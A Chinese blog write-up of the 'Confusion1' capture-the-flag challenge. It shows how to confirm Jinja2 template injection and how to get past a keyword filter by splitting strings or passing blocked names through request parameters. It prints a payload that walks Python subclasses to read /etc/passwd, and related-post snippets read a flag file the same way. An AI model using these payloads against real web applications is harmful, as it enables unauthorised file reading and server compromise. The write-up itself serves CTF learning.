攻防世界----confusion1

jjj34

已于 2022-07-24 10:55:49 修改

阅读量1.1k

点赞数 1

分类专栏： ctf相关文章标签：安全

于 2022-07-22 11:56:43 首次发布

本文链接：https://blog.csdn.net/qq_44418229/article/details/125924948

版权

ctf相关专栏收录该内容

21 篇文章 2 订阅

订阅专栏

知识点1：如何确定存在SSTI注入

知识点2：有些关键字被禁了，如何绕过

一.如何确定存在SSTI

根据网站图片和题目描述的提示，大象是php，蟒蛇是python，说明了这个网站是用python写的

在python中，比较常规的漏洞就是SSTI模板注入

尝试验证漏洞

很明显，是存在漏洞的

同时，也存在过滤关键字段

二.SSTI绕过

参考链接：

SSTI模板注入绕过（进阶篇）_yu22x的博客-CSDN博客_ssti绕过

SSTI模板注入及绕过姿势(基于Python-Jinja2)_Y4tacker的博客-CSDN博客_ssti绕过

经过一系列参数的提交，发现过滤了这些字段

class，mro，subclasses

方法1

通过拼接字符串即

.__class__ -> ["__c""lass__"]
.->[]     __class__ -> "__c""lass__"

需要注意的是，代表函数的()需要放在[]外面

方法2

通过传递参数绕过

GET方式

{{''.__class__}} => {{''[request.args.t1]}}?t1=__class__

POST方式：需要分成两步走

{{ ''[request.value.class][request.value.mro][2][request.value.subclasses]()[40]('/etc/passwd').read() }}

接着给这个页面发一个post的请求包

class=__class__&mro=__mro__&subclasses=__subclasses__

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

jjj34

关注关注

1
点赞
踩
3

收藏

觉得还不错? 一键收藏
打赏
0
评论
攻防世界----confusion1

攻防世界----confusion1如何确定是SSTI漏洞；确定后要怎么绕过
复制链接

扫一扫

专栏目录

攻防世界 web高手进阶区 7分题Confusion1

闵行小鱼塘

10-11

2842

继续ctf的旅程，开始攻防世界web高手进阶区的7分题，本文是Confusion1的writeup

在keras里面实现计算f1-score的代码

09-16

这里使用了`sklearn.metrics`库中的`confusion_matrix`、`f1_score`、`precision_score`和`recall_score`函数来计算这些指标。`val_predict`存储了预测值，`val_targ`是对应的验证数据的真实标签。计算得到的指标被...

参与评论您还未登录，请先登录后发表或查看评论

攻防世界-Confusion1

m0_49025459的博客

02-14

617

访问题目场景某天，Bob说：PHP是最好的语言，但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候，我发现其存在问题。(请不要使用扫描器)然后结合图片我们知道，这个网址是python写的，那python语言书写的网址，存在最多的大概率是SSTI模板注入。

【攻防世界】Confusion1

最新发布

wangzhemvp的博客

04-09

504

request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) "。所以我们可以利用request.args绕过输入黑名单，进行沙箱逃逸。php的标志是大象，Python的标志是蛇。Python 的 Flask 框架( Flask 使用 Jinja2 作为模板引擎 )输入 {{config}} 也有回显，ssti。过滤了关键字，并未过滤request。点进register.php。

攻防世界Confusion1

qq_43774856的博客

12-09

770

Confusion1 打开链接，如图所示点击login，发现无法访问，查看一下源码，有flag的信息看了题解后知道是SSTI 使用{{7*7}} 最常用的 {{''.__class__.__mro__[2].__subclasses__()}} 发现被过滤了经过测试，过滤了很多关键字，如class，subclasses等。这里使用request.args.t1且以GET方式提交t1=__class__来替换被过滤的__class__ {{''.__class__}} => {{''[

攻防世界--Confusion1

qq_46263951的博客

01-16

435

进入页面看到给出一个目录访问后给出flag的目录测试发现存在SSTI漏洞发现存在过滤但是并未过滤request，request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象(flask.request ) " 。利用file类读取文件最终payload： {{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0a.

攻防世界web进阶区 Confusion1

akxnxbshai的博客

01-24

3599

攻防世界web进阶区 Confusion1 难度系数：四星题目来源： XCTF 4th-QCTF-2018 题目描述：某天，Bob说：PHP是最好的语言，但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候，我发现其存在问题。(请不要使用扫描器) 题目提到了php，打开网址首先看到一张图蛇缠在大象身上猜测此系统使用了php+python （php的标志是大象，Python的标志是蛇）然后进入了注册页面发现flag的位置想到了本题可能存在Python ..

Python数据科学速查表 - Scikit-Learn1

08-03

3. confusion_matrix 混淆矩阵是一种常用的模型评估方法，用于评价分类模型的性能。 4. cross_val_score 交叉验证是模型评估中的一种常用方法，用于评价模型的泛化能力。 Scikit-learn 中的 cross_val_score 模块...

React-Confusion

03-28

该项目是通过引导的。可用脚本在项目目录中，可以运行：yarn start 在开发模式下运行应用程序。打开在浏览器中查看它。如果您进行编辑，则页面将重新加载。您还将在控制台中看到任何棉绒错误。...

Confusion-Restaurant-React-

05-21

该项目是通过引导的。可用脚本在项目目录中，可以运行： yarn start 在开发模式下运行应用程序。打开在浏览器中查看它。如果您进行编辑，则页面将重新加载。您还将在控制台中看到任何棉绒错误。...

confusion-front-react

04-08

Create React App入门该项目是通过引导的。可用脚本在项目目录中，可以运行： yarn start 在开发模式下运行应用程序。打开在浏览器中查看它。如果您进行编辑，则页面将重新加载。您还将在控制台中看到任何...

攻防世界 Confusion1

CyhDl666的博客

02-26

275

进入页面 index.php页面查看了源码,没有什么发现进入Login.php页面返回404？？？查看一下源码从这里看可能是个SSTI模板注入这里推荐个初学者的SSTI文章SSTI y 确定是SSTI模板注入按照正常的注入流程{{''.__class__.__mro__}} 页面返回的是从这里来看应该是存在一个过滤想到做过的SSTI题目 shrine用的是url_for函数尝试一下 ...

【攻防世界WEB】难度四星12分进阶题：Confusion1

07-23

704

【攻防世界WEB】四星12分

【愚公系列】2023年05月攻防世界-Web（Confusion1）

时光隧道

05-27

7812

SSTI漏洞（Server Side Template Injection，服务端模板注入漏洞）是一种 web 应用程序中的安全漏洞，它允许攻击者通过在模板中注入恶意代码，执行服务器端的任意代码。模板通常用于 web 应用程序中的动态内容生成，这些模板经常包含逻辑控制语句和变量插入。攻击者可以利用模板中缺乏输入验证和过滤来注入任意的代码，从而实现任意代码执行，甚至是远程命令执行。SSTI漏洞是一种危险性较高的漏洞，因为攻击者可以完全控制服务器端执行的代码和结果。

攻防世界web进阶区 Confusion1 之request.args.key

snowlyzz的博客

05-12

639

又是一道新知识点的题收获很大，现在刷的webctf题都是要依靠大佬的wp，唉，还是太菜了。刚进页面就蒙蔽了，什么都不知道。扫了一下目录和git 没有任何线索。。看了下师傅们的WP。点进去index。php 可以看到报错, 看到url url的信息会在页面上看到，猜测是ssTI注入具体可以看：SSTI注入查看下源 FLAG文件显示出位置一般来说 SSTI的注入payload都是 {{"".__class__.__mro__[2].__subclasses__()[4...

攻防世界 WEB Confusion1

qq_41696858的博客

08-26

161

这题其实跟php没关系，不要被hint给骗了，扫一波目录，就知道其实是用python开发的 emmm。。。找了一圈，没发现有什么有用的东西，看目录结构，盲猜是flask 既然是flask，之前做了好多SSTI，那么就试试，果然 {{7*7}}回显49，确实存在ssti 这题的主要考点其实是过SSTI的过滤，经测试，直接''.__class__被过滤了需要换成{{''[request.args.a]}}?a=__class__其实就跟sql预处理差不多，做一个占位符，然后执行的时候通过参数具体赋值既然找到

xctf攻防世界 Web高手进阶区 Confusion1

l8947943的博客

12-30

1761

1. 直接进入场景，查看环境 2. 分析映入眼帘的是神马奇葩玩意? 思考了一下，蟒蛇（Python）？大象（ElePHPant）？两个扭扯想说明啥？。。不懂打开控制台，看看有没有提示戳一戳链接，发现longin页面和register页面都有如下信息 emmm，按时flag的位置？ blue-whale是什么破玩意？点完后更加懵逼了，大胆猜测，需要审计源码，那么尝试.git漏洞，看能不能搞到源码，如图得，没戏，看看robots.txt同样的显示，说明不能看到源码。如何访问到提示的flag内

r语言计算f1-score

07-13

actual <- c(0, 1, 1, 0, 1) predicted <- c(0, 0, 1, 0, 1) # 创建混淆矩阵 confusionMatrix <- confusionMatrix(factor(predicted), factor(actual)) # 计算F1-score f1_score <- confusionMatrix$byClass["F1"]...

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交